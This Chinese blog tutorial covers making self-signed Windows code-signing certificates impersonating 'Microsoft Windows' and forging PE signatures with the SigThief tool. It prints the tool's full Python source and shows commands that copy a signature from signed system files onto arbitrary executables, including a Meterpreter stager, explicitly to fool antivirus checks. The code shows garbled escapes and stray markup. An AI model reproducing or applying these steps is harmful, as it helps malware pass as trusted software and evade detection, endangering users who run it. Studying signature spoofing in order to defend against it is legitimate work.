zoukankan      html  css  js  c++  java
  • Python 使用sigthief 签发证书

    Windows 系统中的一些非常重要文件通常会被添加数字签名,其目的是用来防止被篡改,能确保用户通过互联网下载时能确信此代码没有被非法篡改和来源可信,从而保护了代码的完整性、保护了用户不会被病毒、恶意代码和间谍软件所侵害,而一些杀毒软件也是通过检测程序中的证书来实现查杀判定的,本章将演示证书的签发与伪造。

    证书制作工具下载: https://github.com/3gstudent/signtools

    制作并签发证书: 正常情况下,针对exe签发证书有如下几个步骤.

    1.查询一个程序中存在的证书,可以使用下面三个命令。

    c:> signtools Get-AuthenticodeSignature C:WindowsSystem32ConsentUX.dll
    c:> signtools signtool.exe verify /v C:WindowsSystem32ConsentUX.dll
    c:> signtools sigcheck.exe -q C:WindowsSystem32ConsentUX.dll
    

    2.使用makecert命令制作证书,sv-私钥文件名,ss-主题的证书存储名称,n-证书颁发对象,r-证书存储位置。

    c:> signtools makecert -n "CN=Microsoft Windows" -r -sv Root.pvk Root.cer
    c:> signtools cert2spc Root.cer Root.spc
    c:> signtools pvk2pfx -pvk Root.pvk -pi 1233 -spc Root.spc -pfx Root.pfx -f
    

    3.注册证书与签发证书。

    c:> signtools certmgr.exe -add -c Root.cer -s -r localmachine root
    c:> signtools signtool sign /f Root.pfx /p 1233 lyshark.exe
    

    而如果要给PowerShell脚本添加证书,则执行如下命令即可.

    1.生成证书文件

    c:> makecert -n "CN=Microsoft Windows" -r -eku 1.3.6.1.5.5.7.3.3 -sv certtest.pvk certtest.cer
    c:> cert2spc certtest.cer certtest.spc
    c:> pvk2pfx -pvk certtest.pvk -pi 123123 -spc certtest.spc -pfx certtest.pfx -f
    

    2.给powershell脚本签名

    c:> powershell
    c:> $cert = Get-PfxCertificate certtest.pfx
    c:> Set-AuthenticodeSignature -Filepath lyshark.ps1 -Cert $cert
    

    伪造PE文件证书:

    有些反病毒软件供应商优先考虑某些证书颁发机构而不检查签名是否真正有效,并且有一些只是检查以查看certTable是否填充了某些值。这个工具让你快速将从已签名的PE文件中删除签名并将其附加到另一个文件,修复证书表以对文件进行签名。

    开源工具SigThief可用于伪造证书,将下方代码保存为sigthief.py即可:

    import sys
    import struct
    import shutil
    import io
    from optparse import OptionParser
    
    def gather_file_info_win(binary):
            """
            Borrowed from BDF...
            I could just skip to certLOC... *shrug*
            """
            flItms = {}
            binary = open(binary, 'rb')
            binary.seek(int('3C', 16))
            flItms['buffer'] = 0
            flItms['JMPtoCodeAddress'] = 0
            flItms['dis_frm_pehdrs_sectble'] = 248
            flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
            # Start of COFF
            flItms['COFF_Start'] = flItms['pe_header_location'] + 4
            binary.seek(flItms['COFF_Start'])
            flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
            binary.seek(flItms['COFF_Start'] + 2, 0)
            flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
            flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
            binary.seek(flItms['COFF_Start'] + 16, 0)
            flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
            flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
            #End of COFF
            flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
    
            #if flItms['SizeOfOptionalHeader']:
                #Begin Standard Fields section of Optional Header
            binary.seek(flItms['OptionalHeader_start'])
            flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
            flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
            flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
            flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
            flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
            flItms['SizeOfUninitializedData'] = struct.unpack("<I",
                                                                   binary.read(4))[0]
            flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
            flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
            flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
            if flItms['Magic'] != 0x20B:
                flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
            # End Standard Fields section of Optional Header
            # Begin Windows-Specific Fields of Optional Header
            if flItms['Magic'] == 0x20B:
                flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
            else:
                flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
            flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
            flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
            flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
                                                                       binary.read(2))[0]
            flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
                                                                       binary.read(2))[0]
            flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
            flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
            flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
            flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
            flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
            flItms['SizeOfImageLoc'] = binary.tell()
            flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
            flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
            flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
            flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
            flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
            if flItms['Magic'] == 0x20B:
                flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
                flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
                flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
                flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
    
            else:
                flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
                flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
                flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
                flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
            flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero
            flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
            # End Windows-Specific Fields of Optional Header
            # Begin Data Directories of Optional Header
            flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
            flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
            flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
            #ImportTable SIZE|LOC
            flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
            flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
            flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
            flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
            flItms['CertTableLOC'] = binary.tell()
            flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
            flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
            binary.close()
            return flItms
    
    
    def copyCert(exe):
        flItms = gather_file_info_win(exe)
    
        if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
            # not signed
            print("Input file Not signed!")
            sys.exit(-1)
    
        with open(exe, 'rb') as f:
            f.seek(flItms['CertLOC'], 0)
            cert = f.read(flItms['CertSize'])
        return cert
    
    
    def writeCert(cert, exe, output):
        flItms = gather_file_info_win(exe)
        
        if not output: 
            output = output = str(exe) + "_signed"
    
        shutil.copy2(exe, output)
        
        print("Output file: {0}".format(output))
    
        with open(exe, 'rb') as g:
            with open(output, 'wb') as f:
                f.write(g.read())
                f.seek(0)
                f.seek(flItms['CertTableLOC'], 0)
                f.write(struct.pack("<I", len(open(exe, 'rb').read())))
                f.write(struct.pack("<I", len(cert)))
                f.seek(0, io.SEEK_END)
                f.write(cert)
    
        print("Signature appended. 
    FIN.")
    
    def outputCert(exe, output):
        cert = copyCert(exe)
        if not output:
            output = str(exe) + "_sig"
    
        print("Output file: {0}".format(output))
    
        open(output, 'wb').write(cert)
    
        print("Signature ripped. 
    FIN.")
    
    
    def check_sig(exe):
        flItms = gather_file_info_win(exe)
     
        if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
            # not signed
            print("Inputfile Not signed!")
        else:
            print("Inputfile is signed!")
    
    
    def truncate(exe, output):
        flItms = gather_file_info_win(exe)
     
        if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
            # not signed
            print("Inputfile Not signed!")
            sys.exit(-1)
        else:
            print( "Inputfile is signed!")
    
        if not output:
            output = str(exe) + "_nosig"
    
        print("Output file: {0}".format(output))
    
        shutil.copy2(exe, output)
    
        with open(output, "r+b") as binary:
            print('Overwriting certificate table pointer and truncating binary')
            binary.seek(-flItms['CertSize'], io.SEEK_END)
            binary.truncate()
            binary.seek(flItms['CertTableLOC'], 0)
            binary.write(b"x00x00x00x00x00x00x00x00")
    
        print("Signature removed. 
    FIN.")
    
    
    def signfile(exe, sigfile, output):
        flItms = gather_file_info_win(exe)
        
        cert = open(sigfile, 'rb').read()
    
        if not output: 
            output = output = str(exe) + "_signed"
    
        shutil.copy2(exe, output)
        
        print("Output file: {0}".format(output))
        
        with open(exe, 'rb') as g:
            with open(output, 'wb') as f:
                f.write(g.read())
                f.seek(0)
                f.seek(flItms['CertTableLOC'], 0)
                f.write(struct.pack("<I", len(open(exe, 'rb').read())))
                f.write(struct.pack("<I", len(cert)))
                f.seek(0, io.SEEK_END)
                f.write(cert)
        print("Signature appended. 
    FIN.")
    
    
    if __name__ == "__main__":
        usage = 'usage: %prog [options]'
        parser = OptionParser()
        parser.add_option("-i", "--file", dest="inputfile", 
                      help="input file", metavar="FILE")
        parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
                      help='rip signature off inputfile')
        parser.add_option('-a', '--add', dest='addsig', action='store_true',
                      help='add signautre to targetfile')
        parser.add_option('-o', '--output', dest='outputfile',
                      help='output file')
        parser.add_option('-s', '--sig', dest='sigfile',
                      help='binary signature from disk')
        parser.add_option('-t', '--target', dest='targetfile',
                      help='file to append signature to')
        parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
                      help='file to check if signed; does not verify signature')
        parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
                      help='truncate signature (i.e. remove sig)')
        (options, args) = parser.parse_args()
        
        # rip signature
        # inputfile and rip to outputfile
        if options.inputfile and options.ripsig:
            print("Ripping signature to file!")
            outputCert(options.inputfile, options.outputfile)
            sys.exit()    
    
        # copy from one to another
        # inputfile and rip to targetfile to outputfile    
        if options.inputfile and options.targetfile:
            cert = copyCert(options.inputfile)
            writeCert(cert, options.targetfile, options.outputfile)
            sys.exit()
    
        # check signature
        # inputfile 
        if options.inputfile and options.checksig:
            check_sig(options.inputfile) 
            sys.exit()
    
        # add sig to target file
        if options.targetfile and options.sigfile:
            signfile(options.targetfile, options.sigfile, options.outputfile)
            sys.exit()
            
        # truncate
        if options.inputfile and options.truncate:
            truncate(options.inputfile, options.outputfile)
            sys.exit()
    
        parser.print_help()
        parser.error("You must do something!")
    

    我们需要找一个带有证书的文件,然后通过使用sigthief.py完成证书的克隆。此处就拿系统中的ConsentUX.dll演示。

    c:> python sigthief.py -i ConsentUX.dll -t lyshark.exe -o check.exe
    Output file: check.exe
    Signature appended.
    FIN.
    

    也可以从二进制文件中获取签名并将其添加到另一个二进制文件中

    $ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
    Output file: /tmp/msftesting_tcpview.exe
    Signature appended. 
    FIN.
    

    将签名保存到磁盘以供以后使用,提供了一个转存功能。

    $ ./sigthief.py -i tcpview.exe -r                                                        
    Ripping signature to file!
    Output file: tcpview.exe_sig
    Signature ripped. 
    FIN.
    ```BASH
    使用翻录签名
    ```BASH
    $ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
    Output file: x86_meterpreter_stager.exe_signed
    Signature appended. 
    FIN.
    ```BASH
    截断(删除)签名 这实际上有非常有趣的结果,可以帮助您找到重视代码功能签名的AV)
    ```BASH
    $ ./sigthief.py -i tcpview.exe -T    
    Inputfile is signed!
    Output file: tcpview.exe_nosig
    Overwriting certificate table pointer and truncating binary
    Signature removed. 
    FIN.
    

    许可协议: 文章中的代码均为学习时整理的笔记,博客中除去明确标注有参考文献的文章,其他文章【均为原创】作品,转载请务必【添加出处】,您添加出处是我创作的动力!
    反制措施: 《点我预览协议》
  • 相关阅读:
    【原创翻译】The Free Lunch Is Over
    【原创】基于ZYNQ7000的交叉编译工具链Qt+OpenCV+ffmpeg等库支持总结(二)
    【原创】基于ZYNQ7000的交叉编译工具链Qt+OpenCV+ffmpeg等库支持总结(一)
    实现内容提供者步骤
    为什么需要内容提供者
    aidl的应用场景
    aidl介绍
    百度音乐盒框架
    通过接口方式调用服务里面的方法
    通过bindservice方式调用服务方法里面的过程
  • 原文地址:https://www.cnblogs.com/LyShark/p/14890075.html
Copyright © 2011-2022 走看看